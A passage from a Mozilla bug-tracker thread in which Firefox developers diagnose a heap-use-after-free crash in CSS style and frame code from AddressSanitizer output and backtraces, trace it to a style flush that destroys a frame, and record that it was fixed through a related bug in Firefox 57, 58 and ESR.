    #43 0x7f713d862a30 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6406:3
    #44 0x7f713d841376 in ConstructFramesFromItemList /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11054:5
    #45 0x7f713d841376 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11368

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/nsStyleContext.h:58:34 in IsServo
Shadow bytes around the buggy address:
  0x0c2480005d80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2480005d90: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c2480005da0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c2480005db0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2480005dc0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
=>0x0c2480005dd0: fa fa fa fa fa fa fa fa fd fd[fd]fd fd fd fd fd
  0x0c2480005de0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2480005df0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c2480005e00: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c2480005e10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2480005e20: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==17027==ABORTING

Comment 1

[Nils]

Attachment: crash.html

Comment 2

[Nils]

Attachment: div.html

Comment 3

[Ryan VanderMeulen [:RyanVM]]

Trunk crash report (Stylo enabled): bp-03c058c4-4649-4490-9016-a2dd40171003
Trunk crash report (Stylo disabled): bp-17806996-86ce-42d9-bebe-b66fa0171003

INFO: Last good revision: 3e8ee3599a67edd971770af4982ad4b0fe77f073 (2016-06-05)
INFO: First bad revision: 396b577b98e64fe95223cfce095f84fe0a67da01 (2016-06-06)
INFO: Pushlog:
https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=3e8ee3599a67edd971770af4982ad4b0fe77f073&tochange=396b577b98e64fe95223cfce095f84fe0a67da01

Matt, can you take a look?

Comment 4

[Matt Woodrow (:mattwoodrow)]

In a debug building I'm hitting "Assertion failure: !wcompartment->lookupWrapper(ObjectValue(*newTarget)) [1], coming from the call to appendChild (looks like we're appending a child from the iframe's document into the outer).

Any ideas bill?



[1] http://searchfox.org/mozilla-central/source/js/src/proxy/CrossCompartmentWrapper.cpp#622

Comment 5

[Jon Coppeard (:jonco)]

I can reproduce, but I don't get that assert.  I see:

++DOMWINDOW == 21 (0x7fffaebc9000) [pid = 20169] [serial = 33] [outer = 0x7fffaebc8800]
[20169, Main Thread] ###!!! ASSERTION: why should we have flushed style again?: 'target == FlushTarget::ParentOnly || (mPresShell && currentGeneration == mPresShell->GetPresContext()->GetUndisplayedRestyleGeneration())', file /home/jon/clone/bug/layout/style/nsComputedDOMStyle.cpp, line 1036

Thread 1 "firefox" received signal SIGSEGV, Segmentation fault.
0x00007fffe176e95c in nsIFrame::IsThemed (this=0x7fffb41daf78, aDisp=0xe5e5e5e5e5e5e5e5, aTransparencyState=0x0) at /home/jon/clone/bug/layout/generic/nsIFrame.h:1665
1665	    if (!aDisp->mAppearance)
(gdb) bt
#0  0x00007fffe176e95c in nsIFrame::IsThemed(nsStyleDisplay const*, nsITheme::Transparency*) const (this=0x7fffb41daf78, aDisp=0xe5e5e5e5e5e5e5e5, aTransparencyState=0x0)
    at /home/jon/clone/bug/layout/generic/nsIFrame.h:1665
#1  0x00007fffe2ae36e5 in nsIFrame::GetUsedPadding() const (this=0x7fffb41daf78) at /home/jon/clone/bug/layout/generic/nsFrame.cpp:1208
#2  0x00007fffe289f81f in nsIFrame::GetUsedBorderAndPadding() const (this=0x7fffb41daf78) at /home/jon/clone/bug/layout/generic/nsIFrame.h:1306
#3  0x00007fffe2ae4434 in nsIFrame::GetContentRectRelativeToSelf() const (this=0x7fffb41daf78) at /home/jon/clone/bug/layout/generic/nsFrame.cpp:1443
#4  0x00007fffe2ae44f1 in nsIFrame::GetContentRect() const (this=0x7fffb41daf78) at /home/jon/clone/bug/layout/generic/nsFrame.cpp:1453
#5  0x00007fffe28826c8 in nsComputedDOMStyle::DoGetWidth() (this=0x7fffafd491a0) at /home/jon/clone/bug/layout/style/nsComputedDOMStyle.cpp:5215
#6  0x00007fffe286c6b9 in nsComputedDOMStyle::GetPropertyCSSValue(nsTSubstring<char16_t> const&, mozilla::ErrorResult&) (this=0x7fffafd491a0, aPropertyName=..., aRv=...)
    at /home/jon/clone/bug/layout/style/nsComputedDOMStyle.cpp:1137

This is a use-after-free of an nsStyleContext.  I don't know what is going on though.

Comment 6

[Jon Coppeard (:jonco)]

Matt, are you still seeing that wrapper assertion and if so could you post a backtrace?  Otherwise, can you forward this to someone who knows more about this area.

Comment 7

[Matt Woodrow (:mattwoodrow)]

It looks like the call to nsComputedDOMStyle::GetStyleContext from nsComputedDOMStyle::UpdateCurrentStyleSources does result in a flush (despite the comment after it saying it won't), and mInnerFrame gets destroyed.

Callstack: https://pastebin.mozilla.org/9069314

mContent->GetPrimaryFrame() returns nullptr at the time of the crash.

Any ideas Cam? I think we probably need to lookup mInnerFrame/mOuterFrame after this call.

Comment 8

[Andrew McCreight [:mccr8]]

Any ideas, Boris? I think "we probably need to lookup mInnerFrame/mOuterFrame after this call" sounds like something I saw in another bug that you were working on, but maybe I'm confused...

Comment 9

[Boris Zbarsky [:bzbarsky]]

Yeah, comment 7 is spot on.  You were thinking of bug 1406750, and this looks like the same issue.

Comment 10

[Matt Woodrow (:mattwoodrow)]

I can't see bug 1406750 unfortunately, I assume this is being fixed there? Can we mark this as a dup?

Comment 11

[Boris Zbarsky [:bzbarsky]]

> I can't see bug 1406750 unfortunately,

You should be able to now; someone added you to the cc list.

> Can we mark this as a dup?

I think we should leave the dependency, then retest this one once we have a fix for bug 1406750.

Comment 12

[Wennie]

Hi Jet:

I have assigned these security bugs to you to reassign them to appropriate developers in your team to investigate and fix them.

Thanks!

Wennie

Comment 13

[Daniel Veditz [:dveditz]]

Jason: now that bug 1406750 has been fixed, can you retest this one and see if it still reproduces or if it did in fact turn out to be the same thing.

Comment 14

[Jason Kratzer [:jkratzer]]

(In reply to Daniel Veditz [:dveditz] from comment #13)
> Jason: now that bug 1406750 has been fixed, can you retest this one and see
> if it still reproduces or if it did in fact turn out to be the same thing.

I cannot reproduce this using the latest nightly.

Comment 16

[Liz Henry (:lizzard) (relman/hg->git project)]

Fixed in 57, 58, and esr in bug 1406750.